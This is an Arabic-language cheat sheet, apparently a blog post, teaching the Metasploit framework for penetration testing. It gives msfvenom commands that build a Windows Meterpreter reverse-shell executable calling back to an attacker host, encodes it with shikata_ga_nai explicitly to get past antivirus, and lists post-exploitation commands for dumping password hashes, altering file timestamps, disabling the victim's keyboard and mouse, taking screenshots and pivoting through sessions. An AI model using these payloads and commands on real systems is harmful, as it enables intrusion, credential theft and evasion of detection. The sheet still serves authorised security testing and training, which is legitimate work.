مشروع اختبار الاختراق في Metasploit لي الكمبيوتر والاندرويد
مشروع Metasploit هو مشروع أمان كمبيوتر يوفر معلومات عن نقاط الضعف ، ويساعد في تطوير اختبارات الاختراق وتوقيعات نظام كشف التسلل.
Metasploit هي أداة شائعة يستخدمها خبراء pentest. لقد أعددت وثيقة لتتعلمها.
ميتاسبلويت:
البحث عن وحدة:
msf > search [regex]
حدد واستغل لاستخدام:
msf > use exploit/[ExploitPath]
حدد حمولة لاستخدامها:
msf > set PAYLOAD [PayloadPath]
إظهار الخيارات للوحدات النمطية الحالية:
msf > show options
ضبط الخيارات:
msf > set [Option] [Value]
ابدأ الاستغلال:
msf > exploit
وحدات مساعدة مفيدة
ماسح المنفذ:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
تعداد DNS:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
خادم بروتوكول نقل الملفات:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
مخدم بروكسي:
msf > use auxiliary/server/socks4
msf > run
msfvenom:
يمكن استخدام أداة msfvenom لإنشاء حمولات Metasploit (مثل Meterpreter) كملفات قائمة بذاتها وترميزها اختياريًا. تحل هذه الأداة محل أدوات msfpayload و msfencode السابقة. قم بتشغيل "-l payloads" للحصول على قائمة الحمولات.
$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
مثال :
عكس الحمولة كملف قابل للتنفيذ وإعادة توجيهه إلى ملف:
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe
خيارات التنسيق (المحددة بـ –f) - تنسيقات المساعدة - سرد تنسيقات الإخراج المتاحة
exe - قابل للتنفيذ pl - Perl rb - Ruby raw - كود قشرة خام c - كود C
ترميز الحمولات مع msfvenom
يمكن استخدام أداة msfvenom لتطبيق مستوى من الترميز لتجاوز مكافحة الفيروسات. استخدم "-l encoders" للحصول على قائمة من برامج التشفير.
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
مثال
قم بترميز حمولة من msfpayload 5 مرات باستخدام تشفير shikata-ga-nai وإخراجها كقابلة للتنفيذ:
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Metasploit Meterpreter
أوامر القاعدة:
؟ / help: عرض ملخص للأوامر exit / quit: قم بإنهاء جلسة Meterpreter
sysinfo: إظهار اسم النظام ونوع نظام التشغيل
إيقاف التشغيل / إعادة التشغيل: واضح بذاته
أوامر نظام الملفات:
cd: تغيير الدليل
lcd: قم بتغيير الدليل على الجهاز المحلي (المهاجم)
pwd / getwd: عرض دليل العمل الحالي
ls: إظهار محتويات الدليل
: قم بعرض محتويات الملف على الشاشة
تنزيل / تحميل: انقل الملفات إلى / من الجهاز الهدف
mkdir / rmdir: إنشاء / إزالة الدليل
تحرير: فتح ملف في المحرر الافتراضي (عادة السادس)
أوامر العملية:
getpid: عرض معرّف العملية الذي يعمل Metpreter بداخله.
getuid: عرض معرف المستخدم الذي يعمل به Meterpreter.
ملاحظة: عرض قائمة العمليات.
kill: إنهاء العملية بناءً على معرف العملية الخاص بها.
تنفيذ: قم بتشغيل برنامج معين بامتيازات العملية التي تم تحميل Meterpreter فيها.
الترحيل: انتقل إلى معرّف عملية الوجهة المحدد
يجب أن يكون للعملية المستهدفة نفس الامتيازات أو امتيازات أقل
قد تكون العملية المستهدفة عملية أكثر استقرارًا
عندما تكون داخل عملية ، يمكنك الوصول إلى أي ملفات تم قفلها.
أوامر الشبكة:
ipconfig: إظهار معلومات واجهة الشبكة
portfwd: إعادة توجيه الحزم من خلال جلسة TCP
الطريق: إدارة / عرض جدول توجيه النظام
أوامر متنوعة:
idletime: عرض مدة خمول واجهة المستخدم الرسومية للجهاز المستهدف.
uictl [تمكين / تعطيل] [لوحة المفاتيح / الماوس]: تمكين / تعطيل الماوس أو لوحة المفاتيح للجهاز الهدف.
لقطة الشاشة: احفظ كصورة لقطة شاشة للجهاز المستهدف.
وحدات إضافية:
استخدم [module]: قم بتحميل الوحدة النمطية المحددة
مثال:
use priv: تحميل الوحدة الخاصة
hashdump: تفريغ التجزئة من الصندوق
timestomp: تعديل الطوابع الزمنية لملف NTFS
إدارة الجلسات
الاستغلال المتعدد:
قم بتشغيل الاستغلال متوقعًا جلسة واحدة تكون في الخلفية على الفور:
msf > exploit -z
قم بتشغيل استغلال في الخلفية وتوقع جلسة واحدة أو أكثر يتم إخفاؤها على الفور:
msf > exploit –j
قائمة بجميع الوظائف الحالية (عادة ما تستغل المستمعين):
msf > jobs –l
اقتل وظيفة:
msf > jobs –k [JobID]
جلسات متعددة:
قائمة بجميع الجلسات الخلفية:
msf > sessions -l
التفاعل مع جلسة خلفية:
msf > session -i [SessionID]
خلفية الجلسة التفاعلية الحالية:
meterpreter > <Ctrl+Z>
or
meterpreter > background
التوجيه من خلال الجلسات:
ستتم محاورة جميع الوحدات (عمليات استغلال / post / aux) مقابل قناع الشبكة الفرعية الهدف خلال هذه الجلسة.
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]
تعليقات
إرسال تعليق